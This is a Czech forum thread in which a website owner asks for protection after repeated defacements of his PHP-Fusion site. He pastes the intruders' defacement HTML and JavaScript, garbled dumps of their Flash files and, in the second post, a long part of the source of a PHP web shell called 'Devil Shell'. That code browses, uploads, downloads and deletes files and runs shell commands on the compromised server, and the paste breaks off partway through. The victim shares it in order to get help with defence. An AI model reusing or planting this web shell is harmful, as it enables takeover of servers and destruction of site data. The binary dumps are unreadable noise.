#1 2011-12-19 18:49:54

Steelm4
Člen
Registrován: 2011-04-09
Příspěvky: 30

Re: Terč Hackera(ů)

Dobrý den, naprosto bezradný Váš prosím o pomoc s jakoukoliv ochranou pro můj web na PHP-Fusionu. Vše začalo asi před měsícem, kdy jsem měl první problém. :

1. Asi před měsícem - Hacker smazal index.php a vytvořil index.html do kterého vložil složitý script a po připojení na web z toho vzniklo toto http://imageshack.us/photo/my-images/20/hackss.jpg/ doprovázené hudbou. Po odstranění index.html a vytvoření zpět index.php web fungoval, až na zavirovanou databázy místo diakritiky to psalo znaky "?????" databázy jsem tedy odranil a vytvořil novou obnovil zálohy webu a databáze a vše bylo tak jako dříve.

2. Zhruba týden po odstranění problému se vrátil ten stejný, ale místo poškození databáze byly smazané php soubory PHP-Fusionu takže login.php, register.php, news.php, contact.php a ostatní..... , takže ve složce /web/ zbyly pouze složky + index.html a v něm stejný složitý script jako před tím. Smazal jsem wešb obnovil zálohu FTP a je po problému.

3. Zanedlouho opět stejný problém jako 2. ,akorát červ v disignu webu. Řešil jsem to opět obnovením záloh FTP.

4. Tak po třech týdnech se objevilo zase něco podobného, akorát místo složitého scriptu v index.html bylo pouze pár řádků HTML něco jako velice slušná forma <p>Smdějí nám údy</p> a tak akorát slovensky. Řešení je stejné jako do ted'.

5. Hned druhý den se stalo opět toto: http://cszona.eu/ Smazaní php souborů

přepsání index.php

<html>
<head>
<title>flash+game</title>
</head>
<body bgcolor=#000000 background="sdasd.bmp"><center>

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
  codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab"
  id="flash+game" width="800" height="320">
<param name="allowFullScreen" value="true">
<param name="movie" value="flash+game.swf">
<param name="quality" value="high">
<param name="bgcolor" value="#000000">
<param name="wmode" value="window">
  <embed src="flash+game.swf" width="800" height="320"
  allowFullScreen="true" quality="high" bgcolor="#000000" wmode="window"
  pluginspage="http://www.macromedia.com/go/getflashplayer"
  type="application/x-shockwave-flash">
</embed></object>

</center></body>
</html>

                                                  

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
  codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab"
  id="hck2" width="480" height="260">
<param name="allowFullScreen" value="true">
<param name="movie" value="hck2.swf">
<param name="quality" value="high">
<param name="bgcolor" value="#FFFFFF">
<param name="wmode" value="window">
  <embed src="hck2.swf" width="480" height="260"
  allowFullScreen="true" quality="high" bgcolor="#FFFFFF" wmode="window"
  pluginspage="http://www.macromedia.com/go/getflashplayer"
  type="application/x-shockwave-flash">
</embed></object>



<html><head><title>Your website is down down down down down down...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta content="Microsoft FrontPage 5.0" name="GENERATOR">
<link rel="File-List">
<script>
window.scrollBy(0, 1)
window.resizeTo(0,0)
window.moveTo(0,0)
//setInterval("move()",30);
setTimeout("move()", 1);
var mxm=50
var mym=25
var mx=0
var my=0
var sv=50
var status=1
var szx=0
var szy=0
var c=255
var n=0
var sm=30
var cycle=2
var done=2
function move()
{
if (status == 1)
{
mxm=mxm/1.05
mym=mym/1.05
mx=mx+mxm
my=my-mym
mxm=mxm+(400-mx)/100
mym=mym-(300-my)/100
window.moveTo(mx,my)
rmxm=Math.round(mxm/10)
rmym=Math.round(mym/10)
if (rmxm == 0)
{
if (rmym == 0)
{
status=2
}
}
}
if (status == 2)
{
sv=sv/1.1
scrratio=1+1/3
mx=mx-sv*scrratio/2
my=my-sv/2
szx=szx+sv*scrratio
szy=szy+sv
window.moveTo(mx,my)
window.resizeTo(szx,szy)
if (sv < 0.1)
{
status=3
}
}
if (status == 3)
{
document.fgColor=0xffffFF
c=c-16
if (c<0)
{status=8}
}
if (status == 4)
{
c=c+16
document.bgColor=c*65536
document.fgColor=(255-c)*65536
if (c > 239)
{status=5}
}
if (status == 5)
{
c=c-16
document.bgColor=c*65536
document.fgColor=(255-c)*65536
if (c < 0)
{
status=6
cycle=cycle-1
if (cycle > 0)
{
if (done == 1)
{status=7}
else
{status=4}
}
}
}
if (status == 6)
{
document.title = "INC Team"
alert("INC Team")
cycle=2
status=4
done=1
}
if (status == 7)
{
c=c+4
document.bgColor=c*65536
document.fgColor=(255-c)*65536
if (c > 128)
{status=8}
}
if (status == 8)
{
window.moveTo(0,0)
sx=screen.availWidth
sy=screen.availHeight
window.resizeTo(sx,sy)
status=9
}
var timer=setTimeout("move()",0.3)
}
</script>






</b></font></p></td></tr></tbody></table></form></div></body></html>
<HTML>
<HEAD>
<TITLE>Your site was hacked, We 0wn Your Security </TITLE>

<script language="JavaScript">
msg = new Array(); //strings written in screen
msg[0] = "<h2><u><center>Your web is hacked by Loach</center></u></h2>";
msg[1] = "<center>You are BIG LAME</center>";
msg[2] = "<center>Hi Admin</center>";
msg[3] = "<center>Your web is stopped ehm.. :)</center>";
msg[4] = "<center>This is shit error in your security</center>";
msg[5] = "<center>!! Have a nice day !!</center>"



text1 = ""; //the same as text2, only the last character is highlighted
text2 = ""; //current string, which will be written
count = 0; //char index in string text
count2 = 0; //number of strings

text = msg[0].split(""); //text - string written

function writetext() { //show strings above on screen
text1 = text2 + "<font color='00ff00'>" + text[count] + "</font>";
text2 += text[count];
document.all["nothing"].innerHTML = text1; //where to write

if (count < text.length-1){
count++;
setTimeout('writetext()', 25);
}
else { //if this string is written, get the new string
count = 0;

if (count2 != 4) { //write 4 strings
count2++;
text2 += "<p>"; //a new line
text = eval('msg['+count2+'].split("")'); //get the new string to text
setTimeout('writetext()', 25);
}
}
}
</script>

</HEAD>










<FONT style="FONT-SIZE: 4pt" face="Courier New">

<DIV align=center style="width: 897; height: 201"><center><TR><TD valign="middle" align="center"><FONT class=pic2ascii><BR><FONT
color=#000000>##1</FONT><FONT color=#808080>#</FONT><FONT
color=#ffffff>0</FONT><FONT color=#808080>@</FONT><FONT
color=#000000>0#0@101@0@0#@1@@#0#@</FONT><FONT color=#c0c0c0>1</FONT><FONT
color=#000000>1@#1#</FONT><BR><FONT color=#000000>01</FONT><FONT
color=#808080>#</FONT><FONT color=#ffffff>0</FONT><FONT
color=#808080>1</FONT><FONT color=#000000>0111@#1#@@###@#00##01@</FONT><FONT
color=#808080>#</FONT><FONT color=#000000>000@</FONT><BR><FONT
color=#000000>01</FONT><FONT color=#ffffff>@</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#000000>#01@#@</FONT><FONT
color=#808080>0111@10#1@</FONT><FONT color=#000000>@0@010#</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#000000>111#</FONT><BR><FONT
color=#000000>@</FONT><FONT color=#808080>#</FONT><FONT
color=#ffffff>1</FONT><FONT color=#808080>1</FONT><FONT
color=#000000>011@#</FONT><FONT color=#808080>#</FONT><FONT
color=#c0c0c0>0@00@10</FONT><FONT color=#808080>0@#@</FONT><FONT
color=#000000>@11110</FONT><FONT color=#c0c0c0>@</FONT><FONT
color=#000000>@@00</FONT><BR><FONT color=#000000>0</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#ffffff>1</FONT><FONT
color=#808080>@</FONT><FONT color=#000000>##1</FONT><FONT
color=#808080>01</FONT><FONT color=#c0c0c0>1@</FONT><FONT
color=#ffffff>1#1@</FONT><FONT color=#c0c0c0>@0#</FONT><FONT
color=#808080>#@1</FONT><FONT color=#000000>1</FONT><FONT
color=#c0c0c0>@</FONT><FONT color=#000000>10##</FONT><FONT
color=#808080>@</FONT><FONT color=#000000>000@</FONT><BR><FONT
color=#000000>1</FONT><FONT color=#c0c0c0>@</FONT><FONT
color=#ffffff>1</FONT><FONT color=#c0c0c0>0</FONT><FONT
color=#808080>1</FONT><FONT color=#000000>@</FONT><FONT
color=#808080>1</FONT><FONT color=#c0c0c0>0</FONT><FONT
color=#808080>0</FONT><FONT color=#c0c0c0>#</FONT><FONT
color=#ffffff>#@0#1@</FONT><FONT color=#c0c0c0>1#@</FONT><FONT
color=#808080>@</FONT><FONT color=#000000>@</FONT><FONT
color=#c0c0c0>#</FONT><FONT color=#808080>0</FONT><FONT
color=#000000>1@</FONT><FONT color=#c0c0c0>10</FONT><FONT
color=#808080>@</FONT><FONT color=#000000>@100</FONT><BR><FONT
color=#000000>0</FONT><FONT color=#808080>#</FONT><FONT
color=#ffffff>1</FONT><FONT color=#c0c0c0>0</FONT><FONT
color=#808080>@#</FONT><FONT color=#000000>@</FONT><FONT
color=#808080>#</FONT><FONT color=#c0c0c0>##</FONT><FONT
color=#ffffff>@#1@1@@</FONT><FONT color=#c0c0c0>@@</FONT><FONT
color=#808080>@</FONT><FONT color=#000000>0</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#000000>#</FONT><FONT
color=#808080>0</FONT><FONT color=#c0c0c0>#@0</FONT><FONT
color=#000000>110@0</FONT><BR><FONT color=#000000>@0</FONT><FONT
color=#c0c0c0>00</FONT><FONT color=#808080>@1</FONT><FONT
color=#000000>@</FONT><FONT color=#808080>0</FONT><FONT
color=#c0c0c0>01</FONT><FONT color=#ffffff>###@1##</FONT><FONT
color=#c0c0c0>@0@</FONT><FONT color=#808080>#</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#000000>#</FONT><FONT
color=#c0c0c0>10@</FONT><FONT color=#808080>0</FONT><FONT
color=#000000>01@11</FONT><BR><FONT color=#000000>1#1</FONT><FONT
color=#808080>1@</FONT><FONT color=#000000>#@</FONT><FONT
color=#808080>1</FONT><FONT color=#c0c0c0>11</FONT><FONT
color=#ffffff>11@0#1#</FONT><FONT color=#c0c0c0>@1@</FONT><FONT
color=#808080>@1</FONT><FONT color=#000000>##</FONT><FONT
color=#c0c0c0>#</FONT><FONT color=#808080>0</FONT><FONT
color=#000000>@#</FONT><FONT color=#c0c0c0>1</FONT><FONT
color=#000000>@00</FONT><BR><FONT color=#000000>#@</FONT><FONT
color=#808080>#</FONT><FONT color=#000000>#11</FONT><FONT
color=#808080>00</FONT><FONT color=#c0c0c0>@#</FONT><FONT
color=#ffffff>1#0##10</FONT><FONT color=#c0c0c0>0#0</FONT><FONT
color=#808080>10</FONT><FONT color=#000000>1@@@0#</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#000000>101</FONT><BR><FONT
color=#000000>#@0</FONT><FONT color=#808080>10#@</FONT><FONT
color=#c0c0c0>@01#</FONT><FONT color=#ffffff>#100@@</FONT><FONT
color=#c0c0c0>##0</FONT><FONT color=#808080>###</FONT><FONT
color=#000000>11#0@#001</FONT><BR><FONT color=#000000>#0</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#000000>#</FONT><FONT
color=#808080>0</FONT><FONT color=#c0c0c0>00#</FONT><FONT
color=#ffffff>1</FONT><FONT color=#c0c0c0>0</FONT><FONT
color=#808080>@</FONT><FONT color=#c0c0c0>#</FONT><FONT
color=#ffffff>@0@#</FONT><FONT color=#c0c0c0>00@</FONT><FONT
color=#808080>#0</FONT><FONT color=#000000>##@@#@</FONT><FONT
color=#c0c0c0>#</FONT><FONT color=#000000>@1#0</FONT><BR><FONT
color=#000000>#0</FONT><FONT color=#c0c0c0>0</FONT><FONT
color=#000000>#</FONT><FONT color=#808080>1</FONT><FONT
color=#c0c0c0>@#</FONT><FONT color=#ffffff>1@</FONT><FONT
color=#c0c0c0>@</FONT><FONT color=#808080>@</FONT><FONT
color=#c0c0c0>@0</FONT><FONT color=#ffffff>##1</FONT><FONT
color=#c0c0c0>@1</FONT><FONT color=#808080>#@</FONT><FONT
color=#c0c0c0>#0#</FONT><FONT color=#808080>0</FONT><FONT
color=#000000>1##00#@@</FONT><BR><FONT color=#000000>#11#</FONT><FONT
color=#808080>0</FONT><FONT color=#c0c0c0>@</FONT><FONT
color=#ffffff>0#1@</FONT><FONT color=#c0c0c0>1</FONT><FONT
color=#808080>1</FONT><FONT color=#c0c0c0>@11#@</FONT><FONT
color=#808080>#0</FONT><FONT color=#c0c0c0>11@1@</FONT><FONT
color=#808080>0</FONT><FONT color=#000000>10#0000</FONT><BR><FONT
color=#000000>1@@#0</FONT><FONT color=#ffffff>#</FONT><FONT
color=#c0c0c0>#</FONT><FONT color=#808080>0@</FONT><FONT
color=#c0c0c0>##011@1#</FONT><FONT color=#808080>#</FONT><FONT
color=#c0c0c0>##0</FONT><FONT color=#808080>@01@0</FONT><FONT
color=#000000>0011#0</FONT><BR><FONT color=#000000>1#</FONT><FONT
color=#808080>@</FONT><FONT color=#000000>##</FONT><FONT
color=#c0c0c0>@</FONT><FONT color=#808080>#</FONT><FONT
color=#000000>1#0#</FONT><FONT color=#c0c0c0>#</FONT><FONT
color=#808080>1#</FONT><FONT color=#c0c0c0>@#</FONT><FONT
color=#000000>@</FONT><FONT color=#c0c0c0>0#1</FONT><FONT
color=#808080>0</FONT><FONT color=#000000>@1@@#1#0@@0</FONT><BR><FONT
color=#000000>1#</FONT><FONT color=#808080>00</FONT><FONT
color=#000000>1</FONT><FONT color=#808080>1</FONT><FONT
color=#000000>0</FONT><FONT color=#ff0000>1#0</FONT><FONT
color=#000000>#@</FONT><FONT color=#808080>10</FONT><FONT
color=#000000>@</FONT><FONT color=#808080>@</FONT><FONT
color=#000000>#</FONT><FONT color=#c0c0c0>0</FONT><FONT
color=#808080>0</FONT><FONT color=#000000>11</FONT><FONT
color=#ff0000>1##</FONT><FONT color=#000000>0@@#0#@1</FONT><BR><FONT
color=#000000>11</FONT><FONT color=#808080>1</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#808080>00</FONT><FONT
color=#000000>@</FONT><FONT color=#ff0000>0@01</FONT><FONT
color=#000000>0@1@0@</FONT><FONT color=#808080>@</FONT><FONT
color=#000000>10</FONT><FONT color=#ff0000>0111</FONT><FONT
color=#000000>##@0@#0@</FONT><BR><FONT color=#000000>#0</FONT><FONT
color=#808080>1</FONT><FONT color=#ffffff>@</FONT><FONT
color=#c0c0c0>@</FONT><FONT color=#808080>0</FONT><FONT
color=#000000>11</FONT><FONT color=#ff0000>11#</FONT><FONT
color=#000000>1##@0@#@1</FONT><FONT color=#ff0000>###</FONT><FONT
color=#000000>@0#</FONT><FONT color=#808080>@</FONT><FONT
color=#000000>00@#@</FONT><BR><FONT color=#000000>@@0</FONT><FONT
color=#c0c0c0>1</FONT><FONT color=#ffffff>#</FONT><FONT
color=#c0c0c0>0@</FONT><FONT color=#000000>1@0@@##1</FONT><FONT
color=#808080>@#</FONT><FONT color=#000000>@@@@1</FONT><FONT
color=#808080>@#00</FONT><FONT color=#000000>@00@01</FONT><BR><FONT
color=#000000>10@</FONT><FONT color=#c0c0c0>##</FONT><FONT
color=#ffffff>1@0@</FONT><FONT color=#c0c0c0>0</FONT><FONT
color=#808080>#@</FONT><FONT color=#000000>@#</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#ffffff>#</FONT><FONT
color=#c0c0c0>@</FONT><FONT color=#808080>1</FONT><FONT
color=#000000>#0</FONT><FONT color=#808080>1010#</FONT><FONT
color=#000000>0101@0#</FONT><BR><FONT color=#000000>0@01</FONT><FONT

color=#808080>100</FONT><FONT color=#c0c0c0>111</FONT><FONT
color=#808080>@0#@</FONT><FONT color=#ffffff>01</FONT><FONT
color=#808080>@</FONT><FONT color=#c0c0c0>#</FONT><FONT
color=#808080>1</FONT><FONT color=#000000>#10@#0@#0##@@</FONT><BR><FONT
color=#000000>0100#0</FONT><FONT color=#808080>110@@</FONT><FONT
color=#c0c0c0>1</FONT><FONT color=#808080>#</FONT><FONT
color=#c0c0c0>@</FONT><FONT color=#ffffff>0</FONT><FONT
color=#808080>#</FONT><FONT color=#000000>@</FONT><FONT
color=#808080>01</FONT><FONT color=#000000>#1@#000@101@0</FONT><BR><FONT
color=#000000>01@1@1#@01</FONT><FONT color=#808080>@</FONT><FONT
color=#c0c0c0>110#</FONT><FONT color=#000000>@11</FONT><FONT
color=#808080>0</FONT><FONT color=#000000>@1@0@#000@#0#</FONT><BR><FONT
color=#000000>##@0##1@@#</FONT><FONT color=#808080>#</FONT><FONT
color=#ffffff>1</FONT><FONT color=#c0c0c0>0@@</FONT><FONT
color=#000000>0@#</FONT><FONT color=#808080>#</FONT><FONT
color=#000000>0110@#001@10#</FONT><BR><FONT color=#000000>#01@00@#@@</FONT><FONT
color=#808080>@</FONT><FONT color=#ffffff>1@#</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#000000>#</FONT><FONT
color=#ffffff>0</FONT><FONT color=#000000>1</FONT><FONT
color=#808080>0</FONT><FONT color=#000000>01@</FONT><FONT
color=#808080>1</FONT><FONT color=#000000>10@01@##0</FONT><BR><FONT
color=#000000>@##11010</FONT><FONT color=#808080>1</FONT><FONT
color=#000000>@</FONT><FONT color=#c0c0c0>0@#</FONT><FONT
color=#ffffff>@#</FONT><FONT color=#c0c0c0>1</FONT><FONT
color=#ffffff>1</FONT><FONT color=#c0c0c0>@0</FONT><FONT
color=#000000>@</FONT><FONT color=#808080>1</FONT><FONT
color=#000000>@</FONT><FONT color=#808080>@</FONT><FONT
color=#000000>#@101#0#1</FONT><BR><FONT color=#000000>11@@#1@@</FONT><FONT
color=#808080>1</FONT><FONT color=#000000>#</FONT><FONT
color=#c0c0c0>#@1</FONT><FONT color=#808080>@</FONT><FONT
color=#c0c0c0>#</FONT><FONT color=#ffffff>@</FONT><FONT
color=#c0c0c0>1</FONT><FONT color=#ffffff>@</FONT><FONT
color=#c0c0c0>@0</FONT><FONT color=#808080>1</FONT><FONT
color=#000000>#1#11111@00</FONT><BR><FONT color=#000000>10#@1001@@</FONT><FONT
color=#c0c0c0>#</FONT><FONT color=#ffffff>1</FONT><FONT
color=#808080>#</FONT><FONT color=#c0c0c0>0#@1</FONT><FONT
color=#ffffff>0</FONT><FONT color=#c0c0c0>#1</FONT><FONT
color=#808080>#</FONT><FONT color=#000000>11@101##011</FONT><BR><FONT
color=#000000>@#@01@0#0#</FONT><FONT color=#808080>1</FONT><FONT
color=#c0c0c0>@</FONT><FONT color=#000000>1</FONT><FONT
color=#c0c0c0>0</FONT><FONT color=#ffffff>#</FONT><FONT
color=#c0c0c0>@</FONT><FONT color=#808080>1</FONT><FONT
color=#ffffff>@</FONT><FONT color=#c0c0c0>#</FONT><FONT
color=#808080>0</FONT><FONT color=#000000>@@@@00100@11</FONT><BR><FONT
color=#000000>@@0#@#1@0#10@</FONT><FONT color=#808080>@</FONT><FONT
color=#c0c0c0>0#</FONT><FONT color=#000000>1</FONT><FONT
color=#c0c0c0>@</FONT><FONT color=#808080>0</FONT><FONT
color=#000000>##11111#010@0</FONT><BR><FONT
color=#000000>1@#@0000101@#0@0</FONT></FONT></TD></TR></center></FONT></DIV></FONT><center><SPAN style="FONT-WEIGHT: 200</SPAN></center><FONT style="FONT-SIZE: 1pt"

face="Impact" color="#ff0000">








<BODY text="#00ff00" bgColor="#000000" onload="writetext()" background="sdasd.bmp">

<table align="center">
<div id="nothing" style="width:'800px'; height:'540px'; font-family:'courier new'; font-weight:'bold'"></div>
</table>

<u><center>
<h2>CSTRIKE GAMER YEAH :P br0.<br>
Sorry...</center></u></h2>
<font color="red">
<center><b>;)</b></center>
<center><b>Your web is destroyed</b></center>
</font>
<P></P></span></BODY>

</BODY>
</HTML>

vytvoření hck2.swf  ( pouze malinká ukázka )

坃ࡓᛲ믌健儝⺰렺뮻뮻ȝ艁섻렭섻ᷝނᨋ巜섂Ὕ玼뷮뵕潿晪黭垵罷ꯝ꭛적Ꞁ䱌॰უ缇罿耟ffi̧죨`怘헰꯮膋超놽趑ᠧʐ헿ဉ₦考붃趍북閱覙㎋ʐ쀅돼諑㤺礙∀ᅧ᫯⥊H擠武櫯憦್䆈訆瀳訅姿࿼慐`丸㐊렀繘ٵ㼈Ⅾ剰ǀ衈堔뀀댱炳ұ㺔ⅺꏿﰗ͟芉ඞ᠎!꽟뿒䰖忶﬷奿៶쿾῱쇀ǿ濿/㫬㕼̱﴾䶧ᄀ꡿iꈇ灴䡝鿹㿺⦘紟῿嗣ꟺᝏ⏵橧晪

Offline

#2 2011-12-19 18:51:36

Steelm4
Člen
Registrován: 2011-04-09
Příspěvky: 30

Re: Terč Hackera(ů)

vytvoření flash+game ( velice zkrácené )
CWSP¸ xÚÜşwTS÷˙?Ž\8Ŕ˝páŢ»µL1Ć4’˝słwr“{3nÖÍޡ1ƈ‘RDKŐ.÷ŞłU;ŢÖŞU;µvY+ßëűśĎżßs~çóÇďw~÷8ŚC^ŹçxŚĽgő˝’•5Ěʱ?«bhö”gc>í-ź’•Ő+k űę°´:´
±˜IUi*-’lv¤3-­Í:ą˜HÁ—×Ë8b˝J¦“ádk"a‡¸.©‡ciBŹKë†íÝ›đ‡ĽnĐ($ŇÖ•ČąrDěád,śŚ{P˜A­Ż©_SG Iôćds{4 Ăhą,>]*'5ÉA#’Ltt&šÓ!ŻW%V8é$@n+!+MuX# 2tŽJƒ:t:T+Sęˆ"ŕ‹@ĎkHJ.U%aIݶHÚÉ„=1“E$ÎL:ÔAŁŐn7 Ő&×)ůJąŘbÖqdbz#‰ˆ#‘ ˇR |ľJDćť@¨Őinź;ňµ'ݱ ©d<§ŰfůJˇ¨$$!•ń$V	V&6WHh"—”™őlž€/V(
Áć¸7sŘ;­±T+#RJ'âŽ4ÇcŻĹ¨ŕňpŤřşz
k|A‹Ĺj„j*Ť@Qql¨Ń˛Ű^·Őí°;}Ńć`"đéM!‘Ű„#€bĐh÷ˇˆAH !™A Q)Dpë­~—Ýër!°–ϡłÄ	„šS©L"ę‹»Q#h­¨Qn† 9lv˜r.“N#±‰\~W-‘ȵ•E§V©Äd<™Č˜üŻ»9Oµy] ÖłE<®qŰÚ:Ú'QTĹćŃp8 ˜L*­Ó`ÓjR&@lh­[ÓÔ¨aGŞ9žNš 

dále vytvořil  11.php

<?php
//========================================//
//========+++DEVIL SHELL 1.2v+++==========//
//========================================//
//====+++CODED BY UNDERGROUNDE DEVIL+++===//
//========================================//
//=====+++TEAM NUTS|| HACKNUTS.COM+++=====//
//========================================//
//====+++EMAIL ID UGDEVIL@GMAIL.COM+++====//
//========================================//
session_start();
ob_start();
error_reporting(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);

?>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> 
<title>υη∂ş˙g˙συη∂ ∂şνιℓ: αη ιη∂ιαη íα¢ęş˙</title>
<body text=#336666 bgcolor="#0000000" oncontextmenu="return false;">
<?php
$pstr="Q3JlZGl0IDogVW5kZXJncm91bmQgRGV2aWwgJm5ic3A7ICZuYnNwOyAmbmJzcDsgJm5ic3A7ICZuYnNwOyAmbmJzcDsgJm5ic3A7RW1haWw6IHVnZGV2aWxAZ21haWwuY29t ";
	$pv=@phpversion();
	$self=$_SERVER["PHP_SELF"];
	$sm = @ini_get('safe_mode');
	
	if(isset($_GET['open']))
	{
		chdir($_GET['open']);
		$_SESSION['dir']=$_GET['open'];
	}
	else if(isset($_GET['create']))
	{
		chdir($_GET['create']);
		$_SESSION['dir']=$_GET['create'];
	}
	else if(isset($_GET['self']))
	{
	unlink(__FILE__);
	}
	
		
 if(isset($_POST['dsub']))
	{
		header('location:'.$self."?open=".$_POST['ndir']);
	}
	function devil($a)
	{
		$sec=strrev(sha1($a));
		return $sec;
	}
	
	function sept()
		{
			$sepr=explode('?',$self);
			echo $sepr[0];
		}
	function validate_email($e1,$e2,$n)
	{
	
	if( (filter_var($e1,FILTER_VALIDATE_EMAIL)) && (filter_var($e2,FILTER_VALIDATE_EMAIL)) )
	{
	if(is_numeric($n))
	{
	$error="";
	return $error;
	}
	else
	{
	$error="Enter valid number of messages";
	
	}
	}
	else
	{
	$error="Enter Valid Email Id";}
	
	return $error;
	
	}
		
if(isset($_SESSION['a'])&& !isset($_GET['edit']))
{	
	function dis()
	{
		if(!ini_get('disable_functions'))
		{
			echo "None";
		}
		else
		{
			echo @ini_get('disable_functions');
		}
	}
	function logout()
	{
	session_destroy();
	header('location:'.$self);
	}
	function yip()
	{
		echo $_SERVER["REMOTE_ADDR"];
	}
	function odi()
	{
		$od = @ini_get("open_basedir");
		echo $od;
	}
	function sip()
	{
		echo getenv('SERVER_ADDR');
	}
	function cip()
	{
		echo $_SERVER["SERVER_NAME"];
	}
	function  safe()
	{
		echo($sm?"YES":"NO");
	}
	function browse()
	{
		$brow= $_SERVER["HTTP_USER_AGENT"];
		print($brow);
	}
	function split_dir()
	{
		$de=explode("/",getcwd());
		$del=$de[0];
		for($count=0;$count<sizeof($de);$count++)
		{
		$imp=$imp.$de[$count].'/';
			
		echo "<a href=".$self."?open=".$imp.">".$de[$count]."</a> / ";
		}
		
	}
	function mysql_ver() 
		{
			$output = shell_exec('mysql -V');
			 preg_match('@[0-9]+\.[0-9]+\.[0-9]+@', $output, $ver);
			 return $ver[0];
		}
		function download()
		{
	
	$frd=$_GET['download'];
	
	$prd=explode("/",$frd);
	for($i=0;$i<sizeof($prd);$i++)
			{
		$nfd=$prd[$i];
		
			}


	@ob_clean(); 
   header("Content-type: application/octet-stream"); 
   header("Content-length: ".filesize($nfd)); 
   header("Content-disposition: attachment; filename=\"".$nfd."\";"); 
   readfile($nfd);

   exit;
	
		}

	if(isset($_GET['delete']))
		{
			if(isset($_GET['file']))
			{
			unlink($_GET['delete']);
			}
			else
			{
				rmdir ($_GET['delete']);
			}
			//$redir=$_GET['open'];
			header('location:'.$self.'?open='.$_SESSION['dir']);
			
		}
	function disk($this)
	{
		if($this=='2')
		$ds=disk_free_space(".");
	else
	$ds=disk_total_space(".");
	
	 if($ds>=1073741824) 
		 {
		 $ds=number_format(($ds/1073741824),2)." gb";
		 }
	else if($ds>=1048576)  
		 {
		 $ds=number_format(($ds/1048576),2)." mb";
		 }
	else if($size >= 1024) 
		 {
		 $ds=number_format(($ds/1024),2)." kb";
		 }
	 else
		{
		 $ds=$ds." byte";
		}

return $ds;
	}
		

	if($_GET['u']=='logout')
	{
		logout();
		header('location:'.$self);
	}
	else if($_POST['u'])
	{
		move_uploaded_file($_FILES['a']['tmp_name'],
		$_FILES['a']['name']);
		move_uploaded_file($_FILES['b']['tmp_name'],$_FILES['b']['name']);
		move_uploaded_file($_FILES['c']['tmp_name'],$_FILES['c']['name']);
		//header('location:'.$self."?open=".$_GET['open']);
		
	}
	
	$str="PHA+PHN0cm9uZz5EZXZpbCBTaGVsbCBWMS4yICBQSFAgU2hlbGw8L3N0cm9uZz48L3A+DQo8cD5E
ZXZpbCBTaGVsbCBWMS4yIFBIUCBTaGVsbCBpcyBhIFBIUCBTY3JpcHQgbWFrZSBmb3IgY2hlY2tp
bmcgdGhlIHZ1bG5lcmFiaWxpdHkgYW5kIHNlY3VyaXR5IGNoZWNrIG9mIGFueSB3ZWIgc2VydmVy
IG9yIHdlYnNpdGUuIFlvdSBjYW4gY2hlY2sgeW91ciBXZWJzaXRlIGFuZCByZW1vdGUgd2ViIHNl
cnZlciBTZWN1cml0eS4gVGhpcyBzaGVsbCBwcm92aWRlIHlvdSBtb3ZlIGluIHNlcnZlciBkaXJl
Y3RvcnkgLHZpZXdpbmcgZmlsZXMgcHJlc2VudCBpbiBkaXJlY3RvcnkgLHlvdSBjYW4gZGVsZXRl
ICxlZGl0IGFuZCB1cGxvYWQgcHJvZmlsZXMuIE1vcmUgb3ZlciB5b3UgY2FuIGNoZWNrPGJyPg0K
ICBTZXJ2ZXIgSVAgLFlvdXIgSVAsIEhvc3RlZCAgUEhQIFZlcnNpb24gLCBTZXJ2ZXIgUG9ydCwg
TWFpbCBib21iaW5nLEREb1MsQ3JlYXRlIEZvbGRlciBhbmQgRmlsZXMvIENoYW5nZSBQZXJtaXNz
aW9ucyA8L3A+DQo8cD48c3Ryb25nPkFib3V0IENvZGVyOjwvc3Ryb25nPjxicj4NCiAgU2NyaXB0
IGlzIGNyZWF0ZWQgYnkgVW5kZXJncm91bmQgRGV2aWwgYSBJbmRpYW4gRXRoaWNhbCBoYWNrZXIg
V2l0aCB0aGUgaGVscCBvZiBUZWFtIE5VVFMgYW5kIE15IGZyaWVuZHMgLndobyBnYXZlIG1lIGlk
ZWEgYW5kIGVuY291cmFnZSB0byBtYWtlIHRoaXMuIFlvdSBjYW4gZG93bmxvYWQgdGhpcyBzY3Jp
cHQgZnJvbSB0ZWFtbnV0cy5pbiAudGhpcyBpcyByZWxlYXNlIHVuZGVyIEdOVSBHRU5FUkFMIFBV
QkxJQyBMSUNFTlNFPGJyPg0KPC9wPg0KPHA+PHN0cm9uZz5MaW1pdGF0aW9uczo8L3N0cm9uZz48
YnI+DQogIFRoZXJlIHNvbWUgZnVuY3Rpb24gd2lsbCBub3Qgd29yayBvbiB3aW5kb3cgc2VydmVy
IC48L3A+DQo8cD48c3Ryb25nPkRlY2xhcmF0aW9uIDo8L3N0cm9uZz48YnI+DQogIFRoaXMgc2Ny
aXB0IG9ubHkgZm9yIGVkdWNhdGlvbiBwdXJwb3NlIGRvbid0IG1pc3MgdXNlIGl0IG90aGVyd2lz
ZSB0aGUgc2NyaXB0IG1ha2VyIGlzIG5vdCB0YWtlIGFueSByZXNwb25zaWJpbGl0eSBmb3IgYW55
IGRhbWFnZSBvciBoYXJtIG9yIGFjY291bnQgc3VzcGVuZGVkPC9wPg0KPHA+PHN0cm9uZz5JbnN0
YWxsYXRpb246PC9zdHJvbmc+PGJyPg0KICBTaW1wbGUgaW5zdGFsbGF0aW9uIGp1c3QgcGVuZXRy
YXRlIHRoZSBmaWxlIHVzaW5nIEZUUCBvciBodG1sIFVwbG9hZGVyIG9uIHNlcnZlciBhbmQgY2hl
Y2sgdGhlIHNpdGUgdnVsbmVyYWJpbGl0eS48L3A+DQo8cD5UaGlzIGlzIHBhc3N3b3JkIHByb3Rl
